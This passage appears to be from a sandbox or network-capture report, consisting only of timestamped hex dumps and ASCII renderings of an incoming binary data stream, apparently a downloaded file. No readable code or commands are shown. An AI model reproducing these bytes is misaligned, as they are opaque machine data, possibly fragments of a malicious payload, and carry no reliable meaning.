1e 6c 96 d8 9c 33 43 15 38 ff 11 0b 81 16 23 35 c4 5f 74 35 1d 93 4e 35 20 23 0e f7 72 40 1c dd 7c 0b 40 dd 2f c2 6b 30 70 8d d8 3d 10 79 88 eb b5 cd ec e7 f1 03 66 a1 05 40 d6 29 6d 1a 99 82 be 5d 68 41
                                                                                                                Data Ascii: }_$5GM]!S7p.jy:?ZEaxaC|!HMtm8Fatfo(brU5/"|pwlCnJ;R.'m63Uk6nP0v h03Z+ >O,8l3C8#5_t5N5 #r@|@/k0p=yf@)m]hA
                                                                                                                2022-10-13 11:07:30 UTC1631INData Raw: 0c ea f3 d7 f5 de d8 6c 43 a2 e4 32 28 ac c3 47 55 1a e9 7b ff f4 8f dc 44 3d d9 29 04 b5 d5 a3 a2 6b 76 98 58 09 58 5c d9 dc 5d 50 db 63 e5 d7 52 5d 42 87 2f a1 fc 81 58 6b 99 1b 83 12 dd b0 12 fe 14 b4 73 84 5c c0 cb d2 6b d4 07 49 92 d9 9c da 3a 86 04 2a 8d 24 cd bc 14 07 61 c2 b3 29 b1 b7 ab 7d d6 62 fa d9 0c 0f 6f 9a d1 74 21 06 16 ce 0b ef 65 00 c5 1b ab 2f d5 f0 f9 ce 36 d8 c4 fe 52 64 b1 33 d3 2c 48 93 61 04 67 ee 48 03 86 de c4 03 51 24 dc bc 0a 5c 79 8b c0 38 bc 06 d1 59 85 4f 51 70 c2 d9 2c e4 a7 8e c7 67 3f c7 e5 d6 c4 1d 44 39 e9 40 b9 3e d1 a4 12 d7 57 ac 66 09 82 2a ae 23 ef 71 98 ad 76 09 f7 d9 b2 a7 06 c3 e8 17 f6 bd 5e 8a e1 53 b1 c3 7c 04 39 d7 b7 2f 89 e1 e8 14 9f d0 b3 05 eb 45 0a 0e e7 07 23 aa 8a 8e 53 b9 a1 92 5e e4 5d cf 28 f0 57
                                                                                                                Data Ascii: lC2(GU{D=)kvXX\]PcR]B/Xks\kI:*$a)}bot!e/6Rd3,HagHQ$\y8YOQp,g?D9@>Wf*#qv^S|9/E#S^](W
                                                                                                                2022-10-13 11:07:30 UTC1647INData Raw: 74 34 87 79 13 61 b0 62 67 12 85 39 35 5e d5 4c 02 40 3f 55 8c 77 11 ec ea 79 72 9a b6 82 86 37 16 40 b8 44 66 73 b6 ef b1 d2 48 5f bc 2c 98 cc 36 ec 75 03 ac cc 80 68 40 5f 46 a8 1a f3 76 2b 5d 44 db 6a eb d6 12 02 ee f5 f1 60 f8 21 ca 57 a5 6c ee 99 72 e8 6f fc b7 c8 4a 90 49 27 60 de d5 39 3f 52 25 6d 10 c2 c1 da 28 26 d2 34 3f 7c f6 cc 14 3d 7d dd 8e 65 57 c1 32 32 f6 ae be 3a 43 6d 64 65 07 f3 ab 0f 10 8a 3b 09 0e 63 1f 19 de 6c 0b cd 81 97 45 15 32 08 5a ff 61 6e ca d0 cf 08 30 85 92 99 22 c6 d8 4e 78 27 92 23 9b 6e db f6 51 c4 30 5e bd eb af 02 61 80 94 3e b3 66 46 7a 3e e5 d8 76 fc e9 a7 d7 e5 5a 5e 50 08 3d b7 28 cf 30 be f2 8e 54 26 06 9a cc 62 60 7c 2d cf 59 3a 9f b5 40 7c 8e 59 69 1d c5 f4 4c 56 09 5b f3 ba 4f 3f 58 c1 1c 1d ba 41 55 dd 56 89
                                                                                                                Data Ascii: t4yabg95^L@?Uwyr7@DfsH_,6uh@_Fv+]Dj`!WlroJI'`9?R%m(&4?|=}eW22:Cmde;clE2Zan0"Nx'#nQ0^a>fFz>vZ^P=(0T&b`|-Y:@|YiLV[O?XAUV
                                                                                                                2022-10-13 11:07:30 UTC1663INData Raw: fc 76 6e c1 8a f3 8e 14 1c 39 e1 13 79 f6 a2 97 ff 68 e2 6b 21 83 59 1b c0 46 84 a8 7f 2c df 0e 88 38 cb bb 61 39 d5 0e 59 2b 91 d9 23 7c bb 13 38 7d 35 f3 b5 df 86 22 94 8f 4a d6 dd 23 96 9c e7 ce 0d 60 98 4c 68 ab 3a 5b 1d 37 5f 5f d4 12 6e fc 61 91 21 89 89 08 7d 9b bd 14 32 5c 51 7f b9 e6 91 60 2e 3d 86 68 b9 bb 1d 3a cd e3 64 6c 55 d2 75 8c c0 f8 a8 0d c0 57 c9 f2 ed 6b f8 3a d7 ab fd 88 0f 38 0e ff 55 d6 e7 04 21 8a 29 15 d3 2c ec 3c ad 98 d5 02 41 83 d0 7d ef 9f d1 fc 1c 97 16 ec 35 62 8a ed 7b 95 8f 12 c0 63 f5 48 c7 40 aa d3 84 49 f7 b2 3e 37 fc f1 c7 d5 68 7d 54 3c af 65 cf 67 ea b8 e7 52 62 73 63 53 55 08 fb d7 c1 05 5a 6d 15 ff 4d d4 14 d5 46 02 d8 a8 20 97 8f 2a 05 b7 4e 98 8d ff c1 b1 f3 33 46 bb ad d7 2f 19 13 70 01 10 a7 e7 58 d8 a9 08 b0
                                                                                                                Data Ascii: vn9yhk!YF,8a9Y+#|8}5"J#`Lh:[7__na!}2\Q`.=h:dlUuWk:8U!),<A}5b{cH@I>7h}T<egRbscSUZmMF *N3F/pX
                                                                                                                2022-10-13 11:07:30 UTC1679INData Raw: b9 93 fc 5d fe ab 9b 6c a9 e5 dc d8 7b 83 ad 76 52 ab 44 db 7d 83 ec ca 90 bb 3a 40 29 1b 04 93 15 c6 41 39 d3 b7 19 30 23 5e 82 0f b1 3e 1e 63 25 e6 4a 3c 67 b2 de 71 b9 8c 69 11 eb d6 52 d6 c9 fc 64 08 89 1d 6a 26 89 c3 d3 db 6b 74 93 7c de 51 09 ac 68 64 f8 66 05 cc 8a 3c 75 3a ba 57 7a cf 21 44 39 84 cd 45 b2 df 42 d3 25 cc 02 1d 36 7d f5 85 b7 6b e2 9a d8 09 79 ac 7a ba 45 1d 1d 85 36 54 56 55 26 2a bf 35 0f 18 7d 5d 92 0b ed d7 cd e3 3d 1e f6 0a 8e 74 8e 15 b4 08 10 f6 04 be ba f9 6c 35 45 47 1b b4 28 50 23 58 b3 20 e1 c6 0c 80 ca 9d cc 91 93 5e 52 3c 76 c3 e1 23 54 f1 f8 6d 0e 49 2d cd 66 76 b6 86 25 ff 94 f3 b6 33 a6 00 b2 37 7b e7 83 c6 99 45 f5 47 33 dc 14 72 fb 62 7d 2e e6 f5 fc 67 07 99 45 c0 1c 80 5d 39 64 fa 13 33 34 70 cf d6 7e 3d 3c 09 91
                                                                                                                Data Ascii: ]l{vRD}:@)A90#^>c%J<gqiRdj&kt|Qhdf<u:Wz!D9EB%6}kyzE6TVU&*5}]=tl5EG(P#X ^R<v#TmI-fv%37{EG3rb}.gE]9d34p~=<
                                                                                                                2022-10-13 11:07:30 UTC1695INData Raw: fc 75 28 49 03 f9 0d f0 54 4a 5b da 5c d8 02 f3 dc 4e 5d 8a a9 38 13 ca 72 34 11 4f b9 d6 3c 38 aa 83 22 4a 03 cf 29 24 75 32 05 cf 9c c0 5b a5 ff 0a 10 1e 24 12 f6 03 76 fd a5 d5 87 bf f0 6d 8a 52 b1 aa c8 2f dc 8c d3 77 72 9e b6 2d 3e d7 94 77 f9 b1 0e ca 81 ac 7f eb a2 9b 35 5b 32 4d fc db 2d 27 f4 1d eb 0a 82 0e 11 2c 71 8b 8e b9 6b eb 44 7e 97 d0 f6 4f 93 70 05 81 e0 7d d0 6d d3 61 cf 53 72 16 cc a6 0e a6 b7 64 64 4a f0 19 8c fe ca 58 82 c6 30 86 85 79 f6 37 75 85 4d 04 16 68 c0 bd 3e 62 f2 a4 c0 f2 fe c6 93 22 bf 5b 96 30 5e 73 f4 f4 19 6b 15 0c 15 8b d7 81 e7 b9 db dc 7e f5 9b 91 4b 5f 9d 7b 1a 19 95 fe 74 00 ad 2b 7b f2 89 e9 e5 b0 6e 89 3e 30 8f c2 c6 e5 13 68 02 db da 49 e8 57 f3 14 dd b3 49 c5 b6 9b 65 c2 db 37 db a5 54 81 1b 39 13 11 ab 29 fc
                                                                                                                Data Ascii: u(ITJ[\N]8r4O<8"J)$u2[$vmR/wr->w5[2M-',qkD~Op}maSrddJX0y7uMh>b"[0^sk~K_{t+{n>0hIWIe7T9)
                                                                                                                2022-10-13 11:07:30 UTC1711INData Raw: a4 5d 2a 99 41 81 d5 2d bd 4a 9d 59 31 c0 ff 0c 8c bb 9f f6 b9 54 57 2b bc 6b f0 64 3d 97 f4 05 37 7f 5a dd 82 62 1e 0e 77 1c 65 e5 5a 44 72 c5 b3 96 3f 79 98 5d f8 fe b2 80 3c e6 3b 6b fb 2e b9 9e f2 c0 88 ab be fd 6a c3 d2 10 4b dd 00 80 7f 3a da 20 67 bd 1b fe 06 84 ce 53 71 28 b8 b4 f2 d4 ed 23 bf 28 41 18 ca 24 c6 d5 8e d5 9a 48 0b 46 3b ff 3d 13 5b f0 f5 09 cb f0 56 80 ab 10 13 8a 04 e2 16 89 48 a2 3e 0e 12 3e c9 40 98 8c dd 94 3b ec 24 5a 70 64 51 58 e6 8c ac f7 52 a1 2a 72 5c 49 d9 ab 0e 60 48 6c e0 d0 22 55 23 65 e6 90 18 02 a0 a8 82 75 ee 88 a5 d3 0a 0f d0 a0 9c 1e 1a c2 3d 23 3e 87 40 38 4a b2 a0 e8 8b 36 20 6a 66 f9 00 10 6a b5 5f 69 5b ba 66 bc fc 02 5c 38 d9 45 89 e4 07 e3 e0 86 35 79 ed ef ab 82 91 d8 f9 ed 6c 0d 47 b4 19 b0 70 c9 31 eb 50
                                                                                                                Data Ascii: ]*A-JY1TW+kd=7ZbweZDr?y]<;k.jK: gSq(#(A$HF;=[VH>>@;$ZpdQXR*r\I`Hl"U#eu=#>@8J6 jfj_i[f\8E5ylGp1P
                                                                                                                2022-10-13 11:07:30 UTC1727INData Raw: c0 8b 15 b4 f7 93 6b b3 71 2f 1f c9 31 c7 2f d9 2f 4f ad ec 8d 98 7f 99 f7 99 76 48 27 d1 79 3c 69 45 86 16 d4 01 6a 80 6e c9 5a 68 25 0a 2f 38 91 89 4d 80 c2 39 bb d0 b3 b4 f0 dd f0 5a da 1e 30 86 d0 09 56 58 43 21 98 73 4a 42 6d da f1 4a 6b ee ce 65 27 8c 11 97 c7 44 97 6b f4 01 f3 e6 f8 01 90 5b ab 43 f2 83 23 e7 3a d0 9d ca 99 f0 c0 7d 73 41 00 21 55 dd 21 1c 30 58 c3 66 60 e2 3a 23 d1 ba 50 7d ad 5a 49 f3 b8 6e 9a 61 03 74 59 ce 1f 0b fd fd 06 1f 7e 38 b5 69 50 7a c9 88 de b9 0c d9 8f 6c 94 18 70 99 9d cb 69 d6 62 d5 39 db 78 bd b3 ef 71 fc 67 57 f4 a4 91 c2 96 c1 75 e2 64 cc 1d 58 58 8a 09 c1 9c 14 b6 cf a6 e2 51 84 29 48 3f 3f b2 c0 ee 12 13 0b 11 26 82 f1 c5 41 ab c7 4d 81 e1 14 fc 37 1b 0e 35 c1 84 3c 88 11 94 03 0d f7 91 de 59 69 23 46 f3 1b b2
                                                                                                                Data Ascii: kq/1//OvH'y<iEjnZh%/8M9Z0VXC!sJBmJke'Dk[C#:}sA!U!0Xf`:#P}ZInatY~8iPzlpib9xqgWudXXQ)H??&AM75<Yi#F
                                                                                                                2022-10-13 11:07:30 UTC1743INData Raw: f7 40 71 b0 5b 86 10 c8 70 3b b9 9a 86 46 15 19 e8 8a 48 4c 41 1d ea a3 7c cc 0d 39 9b f9 0b e2 39 33 3c e6 8b 76 12 94 e2 df 07 5a a4 08 24 0d cb f1 d2 c1 a3 a3 69 70 01 34 01 8b 80 72 79 e7 4e 29 6c 2c 03 4e 1a 28 04 dc 4c a2 ad ce 5c 38 2b fa 6d de f5 d7 20 10 dc 3d e6 a7 a5 ab fd ba 34 89 d4 61 5c 39 37 62 9d f7 a3 74 99 c2 39 63 f4 d3 25 30 b1 bb 3e d3 79 97 62 88 41 ab e8 4c 72 85 e3 fe 37 e8 d0 e7 df 02 b0 c4 c3 0a 46 cb ff 2f b0 38 de 6a ff 53 46 95 13 ae 32 b3 d8 dc ca 78 9c e0 f5 bf 2c af 89 b9 c7 17 d9 2e 0b b6 38 b9 88 62 ad 8e fb c9 c5 5b 46 e0 79 c7 b4 3c 79 8a 7e 3d 61 a3 48 96 9e 15 a7 81 07 5a e6 af f5 03 68 b9 dc 63 c6 0d f3 30 a6 73 8d 9b 04 6f bd 30 f5 44 0d f6 bc 57 a7 10 28 5a 91 e2 7c 0a a0 f8 ea 11 94 e2 7b ab 27 e0 08 60 91 7f 30
                                                                                                                Data Ascii: @q[p;FHLA|993<vZ$ip4ryN)l,N(L\8+m =4a\97bt9c%0>ybALr7F/8jSF2x,.8b[Fy<y~=aHZhc0so0DW(Z|{'`0
                                                                                                                2022-10-13 11:07:30 UTC1759INData Raw: 86 e3 69 1d 0a c5 97 50 07 f6 3d fb d1 32 bc 69 92 23 0a e7 63 78 44 04 2b 38 26 ef 0c 79 d7 f8 46 62 03 e1 95 ec 25 ad c8 75 56 df 63 23 00 3b 5a 75 94 d3 b8 a1 f1 e3 e3 19 88 fe f4 fd 18 74 aa 53 7b d1 bb 82 4d bc 16 f9 72 3a 70 13 ae 6a bf 5e 57 62 9f eb 35 89 31 4d b4 5d af 38 f6 19 e9 4b 80 6e ed 3e 88 71 d3 03 8a 0d 81 49 69 9b 00 b5 e0 90 ce bd 4c b3 65 5e 11 4e cf 6a 5f fc ee 2a 77 4e f1 36 24 6c be 11 5f 05 14 22 29 84 3a 97 b7 1b e7 74 2f 95 88 be a7 54 e8 37 c4 dc 06 95 57 f0 a1 e5 f3 ea 93 20 9a 83 2f 06 ea 1b 34 d0 f9 93 db c9 64 0a f5 28 9d 85 81 e4 60 c6 e8 71 3f 2b f7 c7 af 9f 4b 8b e0 e1 13 03 ae b1 22 30 d0 8c 59 5b 40 7e aa 90 b3 05 30 ed 15 12 18 fe be 3b 86 7c 9f 07 2a e1 d0 ae 9f bf 2c 99 60 d9 b1 9f 9e 8d e2 fd ce b4 80 77 8d 4b 11
                                                                                                                Data Ascii: iP=2i#cxD+8&yFb%uVc#;ZutS{Mr:pj^Wb51M]8Kn>qIiLe^Nj_*wN6$l_"):t/T7W /4d(`q?+K"0Y[@~0;|*,`wK
                                                                                                                2022-10-13 11:07:30 UTC1775INData Raw: 06 2a de a4 a4 48 35 97 b8 63 3e fa 11 f8 01 82 82 76 96 38 9f ca 5b 55 1d 7d 29 3a b2 ea 3e a0 13 ed 51 ad 3c 8f 0d 27 fe af a0 b1 57 10 72 45 53 38 4c be 4a 65 bc 95 cd b9 de 6d 28 d7 14 b8 90 4c 99 2c 37 33 7e 63 1b a1 ef e6 93 57 14 75 23 90 32 0a 40 45 84 37 88 d9 f5 2b e7 ab bf 58 81 a7 85 ac 42 b3 48 0a d2 ae 82 5c a4 8c 9e 3e 2b 6b bf f7 a4 8c 14 99 04 cd d5 aa 75 37 f1 ed c5 d7 cf e8 c0 1f a5 b3 e4 1e 9b 6b 72 9e 27 ff d2 21 77 1d ec 0d b6 db 41 d6 08 56 f7 b7 ef db d8 6c e7 3b 55 54 da b1 eb 42 0d 6b 94 e1 fc 33 dc b9 98 22 a7 bf a2 b9 7f d7 11 22 20 bb a4 c8 8c 1f ae 0a 2e 9f 73 02 05 4f b1 48 0c bf 7c 5d fc e0 b5 62 c6 6a 1c 33 e7 c7 81 57 e0 8a b1 98 70 44 51 3b b0 30 1c d4 a0 2c c4 81 56 be ca 97 ec 7e 92 d5 4f 21 38 66 c6 b1 a4 ce 33 95 24
                                                                                                                Data Ascii: *H5c>v8[U}):>Q<'WrES8LJem(L,73~cWu#2@E7+XBH\>+ku7kr'!wAVl;UTBk3"" .sOH|]bj3WpDQ;0,V~O!8f3$
                                                                                                                2022-10-13 11:07:30 UTC1791INData Raw: e7 e8 2e 20 4f 4b 51 3a 74 5e 93 4a 0b a7 b8 18 3e c9 2c 59 3d 6d 90 21 7b 46 b6 14 73 f3 33 02 64 f8 f1 52 68 a9 16 e4 c6 00 5e 53 15 72 1e 0c ef b5 fd bb 05 4f 58 b8 91 9c ca aa d6 bd bd e9 d8 60 e9 d6 38 d1 5a 9e f3 1c 1d 97 24 3e e9 16 3f 88 43 40 bb 9f 69 f5 05 a7 ab 84 22 4b e4 a6 b2 01 bc fa 3f 42 1a c4 3c 32 fc d5 3f cb 56 83 e9 04 32 4e 5e 3a de 9e ec 4f de d2 03 12 bd 69 5b 0f bb 54 1e 42 c5 be f4 5b 0b b2 76 4c 7f f2 e7 50 94 e0 08 55 fc 23 ba 03 c6 58 cc ed ac b2 67 12 50 4d 22 ac 50 29 68 77 6e 39 96 fb 24 6a fd 50 f3 4e c6 69 3c 86 bd ff 76 ec 04 a5 b7 10 ab 16 0a 36 53 9e aa c4 c0 d3 63 c6 c5 db 62 c0 44 34 2c 2c db 6d aa 8b 99 07 7f ee 54 2c 48 7b 00 3e 2a a1 da f4 f9 a5 2d d1 5a ab aa 5a 05 f1 88 b3 7b 73 c5 b6 18 20 2f 1e 73 c3 19 4f 08
                                                                                                                Data Ascii: . OKQ:t^J>,Y=m!{Fs3dRh^SrOX`8Z$>?C@i"K?B<2?V2N^:Oi[TB[vLPU#XgPM"P)hwn9$jPNi<v6ScbD4,,mT,H{>*-ZZ{s /sO
                                                                                                                2022-10-13 11:07:30 UTC1807INData Raw: a6 06 14 12 95 92 4c 16 28 c6 4f 6a 4c 11 0b 0c 66 b7 d2 78 ef 5f 74 89 d9 a8 02 da 9c 87 84 30 c5 b9 b7 a3 16 84 91 31 09 61 89 7a 7a ef 3e 0a cb cb 50 0b 9b d1 59 e2 d1 13 cd 5f 6e 3b 5a 07 77 bc 64 f4 e7 f9 80 b9 2e d8 a4 17 f5 08 36 d4 82 d4 5b 02 94 6f ee 5a 61 46 53 5b c0 6c 6c 3e 80 dc 81 91 22 87 61 42 ba bc 3f a6 17 81 84 51 ab f0 4d b4 3d 7c f9 a4 3b a2 2e fa e0 2c b3 73 43 24 68 af 71 1d 6f bf 5d cf 1b e8 ab fe 19 ea 6e 40 bb e8 de 8c c9 7d 3d 9b e9 15 1b 8d 1e c1 91 93 31 32 33 6b 5b 9a 05 f6 e5 dd 1d 44 50 9d ac 10 27 04 82 bb 94 ed 8d 4b ca 53 36 64 bc 0d c6 f4 15 e0 78 79 9f d3 18 ee 74 e9 91 e6 72 f2 df 8d e4 81 db 73 24 65 cc 97 8d d8 98 f5 17 cc 0f 43 fd 44 ca 72 5a c8 de f9 38 21 01 0b 93 58 33 bf df ff 65 cb 40 90 e9 ba 9b 7d cc 6c b5
                                                                                                                Data Ascii: L(OjLfx_t01azz>PY_n;Zwd.6[oZaFS[ll>"aB?QM=|;.,sC$hqo]n@}=123k[DP'KS6dxytrs$eCDrZ8!X3e@}l
                                                                                                                2022-10-13 11:07:30 UTC1823INData Raw: f3 55 fb f0 97 f9 55 b2 7a 7b 21 55 68 1b cd 06 c3 57 ce 0e 1c d7 bf 8f 00 6d a1 db ac c1 37 ed 28 c7 8a d4 05 6b 5d 82 0e d8 c6 3d 4d 3f e7 52 6f 1a ad 39 ba 54 17 da be cb 64 3e a2 af bd 93 ac 13 14 11 ac fe d3 02 b4 cf 43 15 ca f7 8e 0b 6d 31 db ad ca 37 7d 58 c6 81 d4 a0 ab 5c 89 0e fd a6 3c 46 3f 92 c2 6e 11 ad 81 32 55 1c da 43 93 65 35 a2 aa 71 fc 37 ea 13 f0 0d 22 ea aa 21 4a 72 4d ad a4 81 ff 4e 16 85 11 6a 64 76 5c 4b 4d 2d 0a c5 15 07 ac 59 cb b5 dd 3d 36 00 75 40 f9 81 e2 21 bd 95 ac 4f 18 27 4c e8 9c 16 91 a5 ce 58 7d 70 52 7b a9 ac 01 00 00 c0 1f 68 45 aa fd 23 32 62 f3 03 ac 7b 40 ed 20 ac f1 17 27 22 2a 7d 80 66 65 f3 9b 8b fe d5 c5 f6 74 64 0c 2a ca bf 40 64 79 93 5b 2d ca a1 d0 31 30 d3 d5 eb ec 00 00 00 40 cf d8 8e 95 cd 86 ed fd 15 08
                                                                                                                Data Ascii: UUz{!UhWm7(k]=M?Ro9Td>Cm17}X\<F?n2UCe5q7"!JrMNjdv\KM-Y=6u@!O'LX}pR{hE#2b{@ '"*}fetd*@dy[-10@
                                                                                                                2022-10-13 11:07:30 UTC1839INData Raw: ff 86 87 d6 55 98 43 e8 d0 55 91 f7 9f 51 2a 19 54 d4 3f aa f6 af 82 90 d5 45 46 f3 c9 55 0c 06 ed 1d 2a a8 fe e9 9d d5 18 28 e4 f6 55 72 75 f8 fc 55 97 3f 14 24 55 55 98 f8 6b 2a 32 f9 b9 37 aa eb cd ce b6 d5 d3 ce 85 d8 55 9c 95 d3 77 2a 67 6c a2 2e aa 46 6c bc fa d5 ba c4 b8 7a 2a 8e d7 55 10 c3 17 65 dc 43 99 9a 95 be b6 70 36 30 b5 46 55 e4 96 4f 48 1c 94 8a 4c b9 b7 88 a7 46 ba b9 5c 3a b4 b7 04 af 82 b0 46 ee b8 9c 4d 4a d0 ae 6a 4e b9 87 ed fb 4d b9 0c 2e 21 bd b6 ad 4e af 42 49 04 82 0a 49 b9 01 70 ac b3 b7 08 80 b0 b0 46 bb a4 9d ba 45 4d 48 00 48 48 68 63 b8 4c b9 3a b7 fe b1 b5 fa 2c 97 07 17 00 00 00 2b aa b9 ff 15 d3 22 b1 07 bc ed dd 44 5a c9 62 9c b0 7f f1 4f 2f 8a b3 25 58 29 db 23 3f 5c ee 8f 02 74 40 60 1d 57 fa 10 8e c3 c6 db 1d fa 5e
                                                                                                                Data Ascii: UCUQ*T?EFU*(UruU?$UUk*27Uw*gl.Flz*UeCp60FUOHLF\:FMJjNM.!NBIIpFEMHHHhcL:,+"DZbO/%X)#?\t@`W^
                                                                                                                2022-10-13 11:07:30 UTC1855INData Raw: 08 c0 94 af 0a 80 69 ca e1 f3 45 87 78 f1 7f 64 66 b1 0d b8 39 36 12 39 d6 79 27 a8 a3 38 ee ef 11 1c cb e7 46 88 b5 e1 07 17 00 00 00 0a 9e a5 ff 17 a5 1a a0 7f 80 8c a1 3f 95 0f c6 a7 f6 93 41 bb 96 8e e7 87 10 02 5b 5c 40 e5 ed a3 5a 09 b5 fd 32 65 78 86 4f a0 04 d3 b7 29 56 80 38 8d f4 65 62 34 d3 aa f5 5c 87 21 ab 07 20 e4 74 ad 7f 5d 58 05 51 80 e2 c8 1c a8 7f 74 a2 97 a8 7f 01 be b3 54 80 18 b9 40 59 80 6a b6 2f aa 7f 08 47 87 a6 7f fc 81 e7 5a 80 1b 32 4b 5f 80 85 be 1c a6 7f 0a 8a 49 a2 7f 15 9e 38 5e 80 34 4e 21 a7 7f fc 0c aa a7 7f 95 e8 8e 5b 80 7c 57 7d 56 80 b4 98 12 a5 7f 30 01 ba a9 7f 84 95 c9 55 80 fe 1a c1 80 b9 b3 bf b8 46 f2 10 65 48 49 4b 48 eb b7 b6 62 a4 4e bc 46 8f be e8 46 48 86 8e f4 45 b9 7d e2 d9 4f ba a3 a6 44 bd b7 26 6d fc
                                                                                                                Data Ascii: iExdf969y'8F?A[\@Z2exO)V8eb4\! t]XQtT@Yj/GZ2K_I8^4N![|W}V0UFeHIKHbNFFHE}OD&m
                                                                                                                2022-10-13 11:07:30 UTC1871INData Raw: 8e 9e a2 e9 28 e1 98 e4 45 61 37 92 c0 25 1d 81 c7 20 76 73 08 9e 73 03 7a 97 a2 11 35 94 07 7a 0c 5c 0c 6a 5d c3 df 99 fa 85 6e 2c 40 ca 22 ca 39 88 e3 4f 69 84 b6 53 76 49 bb ff 00 00 02 51 4f 17 58 d9 ed 0e fb 64 69 5b 78 93 53 f5 8c 4e 00 00 00 00 03 93 23 09 7a d5 a9 f8 63 ac 07 9f 47 42 81 02 13 b3 61 38 af e2 47 7f 3b 12 3a 1c 94 b3 64 1d eb b9 7d 52 1d ef 23 b1 ef c5 76 56 30 9d e2 e5 37 9e a1 e2 5b 7f e8 05 3a 46 a6 70 68 1d 39 55 e5 f8 c5 e4 de eb 01 3a 38 e0 11 5f 1d ab 8b 1f e2 c5 e8 d0 97 94 e2 af bd 59 a2 e2 eb 3f 95 1f 3a 6a ea 14 6d 1d 59 b3 ba 51 1d df 83 cc f5 c5 ba 33 88 de 20 f9 17 f3 e3 fc 2c 9f ed 1e a8 95 5c f4 44 90 c0 75 87 52 44 63 19 24 66 e6 d8 bc 01 c6 dc 35 c6 9f e6 b0 3d c3 68 78 38 6e ad e1 21 6b fa 6e 35 6a ff a9 6b 52 1a
                                                                                                                Data Ascii: (Ea7% vssz5z\j]n,@"9OiSvIQOXdi[xSN#zcGBa8G;:d}R#vV07[:Fph9U:8_Y?:jmYQ3 ,\DuRDc$f5=hx8n!kn5jkR
                                                                                                                2022-10-13 11:07:30 UTC1887INData Raw: 00 f8 39 72 13 10 80 46 00 fd 73 14 00 8d 1f 81 65 90 1e 3e 00 8a 00 13 00 7e 1e 93 42 41 88 48 00 ee 04 13 00 f4 16 fd 5c f3 bd 2a 00 e3 b7 14 00 52 1e 90 70 bb 18 3e 00 c8 b8 13 00 aa 61 b3 24 86 a3 29 00 fa 2e 14 00 b1 6e d6 78 1e 64 4a 00 a7 3b 15 00 a2 08 a9 48 ee 2e 4a 00 d9 3b 15 00 aa 72 34 02 66 50 4b 00 0e 41 14 00 94 64 ba 3e 84 00 3f 00 66 32 15 00 56 13 fb 42 8f d0 2a 00 89 59 13 00 78 6b ef 42 1f f9 4a 00 8a e2 14 00 e7 49 ae 3d 97 3b 2a 00 d0 40 13 00 91 24 13 31 66 9e 3e 00 78 7b 14 00 64 5b 49 15 b6 55 2c 00 94 b7 14 00 c6 27 7a 70 d1 a3 46 00 c4 41 13 00 c9 34 df 36 20 df 47 00 81 53 13 00 e4 03 b6 59 04 ab 49 00 73 2c 15 00 f7 31 70 46 16 01 2a 00 05 f1 13 00 7f 47 85 0d ae bb 48 00 0a 59 13 00 d5 4c da 71 7a 66 4a 00 7e 13 13 00 95 5c
                                                                                                                Data Ascii: 9rFse>~BAH\*Rp>a$).nxdJ;H.J;r4fPKAd>?f2VB*YxkBJI=;*@$1f>x{d[IU,'zpFA46 GSYIs,1pF*GHYLqzfJ~\
                                                                                                                2022-10-13 11:07:30 UTC1903INData Raw: 9f 84 a0 63 1f 7b 6c 28 eb b0 2e 05 8a cf 52 8f 0f 01 03 21 15 d2 11 8d 39 d1 66 e0 c5 d3 2e fd a3 8f c1 2e 24 09 2f 21 2e a7 85 42 38 d1 d4 11 e5 3f 2e 5c d6 2b 39 d1 69 b8 af 34 d1 96 68 47 36 d1 34 ca bc 1f d1 86 5a 44 c1 d1 a6 4d 2c c4 2e 44 2c 64 2e d1 51 77 2e 3c d1 0f bd 8e dc d1 12 b1 e3 c5 2e 00 2d 44 c2 d1 a0 da 8a c4 2e da bc 2b d1 2e 0c 06 46 c0 fc ff ff ff 50 26 e4 9e 36 73 9d 26 91 bf ca e0 4c 00 62 e0 4c 00 ff ff ff ff 2e 58 ed 5e 78 92 5e 78 f1 ff 93 2f 91 25 3a f9 3d 62 82 07 85 91 4d d2 0e b2 d9 6c ca 29 8c b1 df 36 36 6e 5c e5 bc ff 05 4a 8c 30 6e 31 b5 73 1f 22 02 02 98 0e 7d 30 88 bd 34 f0 ce 91 9a 39 20 75 8d 26 0f de b3 ff 21 ce b3 ff ff ff ff ff 47 3c 2f df eb 1e d1 0f 53 90 dc 33 6e a9 24 81 81 68 0b 90 be 3d 70 b6 bf 56 7d ea 2b
                                                                                                                Data Ascii: c{l(.R!9f..$/!.B8?.\+9i4hG64ZDM,.D,d.Qw.<.-D.+.FP&6s&LbL.X^x^x/%:=bMl)66n\J0n1s"}049 u&!G</S3n$h=pV}+
                                                                                                                2022-10-13 11:07:30 UTC1919INData Raw: dc dc d1 d7 04 dc 2a 08 70 94 df 2a d0 34 c2 a4 58 d6 ee 27 d5 ab 11 1e 6e 59 03 0f ee 42 fc f6 6c 20 67 49 20 ed d5 2a 9f 1e 29 82 0c 47 48 13 e4 78 79 ef a6 7a 46 2f e2 20 d5 45 aa 81 e6 08 13 c4 01 de 2a 15 1b a2 36 80 28 f5 9a 35 d5 d4 80 b5 dd 6a df ce 3d cb 2a df de bc 65 73 55 80 d1 de 2a 34 a8 1e e8 a6 6b d5 2f d5 94 d0 93 32 4e e3 2e 94 97 05 1d af 8c bc 66 ce 6a b9 09 f5 13 95 5b 2d fa 24 95 67 7d 6d 34 95 9c 26 5a cb 6a 18 74 3b 0d 95 ac 06 b8 2a 95 9c 22 23 36 95 17 ad cf cd 6a de 80 d4 0a 95 9d 45 eb 20 95 55 29 f2 3b 95 db 5d ad fb 6a 8b 89 a2 cc 6a 87 e9 35 dc 6a 7c c2 02 23 95 70 00 63 e5 6a de 6a e0 c2 6a aa 06 7b de 6a 69 af e1 c2 21 0c f8 41 4f 37 da 06 8c 14 8c b6 c9 24 78 ad 64 81 41 32 f4 8e 49 b9 c7 d6 28 b3 b7 e6 ee 34 b0 46 85 3a
                                                                                                                Data Ascii: *p*4X'nYBl gI *)GHxyzF/ E*6(5j=*esU*4k/2N.fj[-$g}m4&Zjt;*"#6jE U);]jj5j|#pcjjj{ji!AO7$xdA2I(4F:
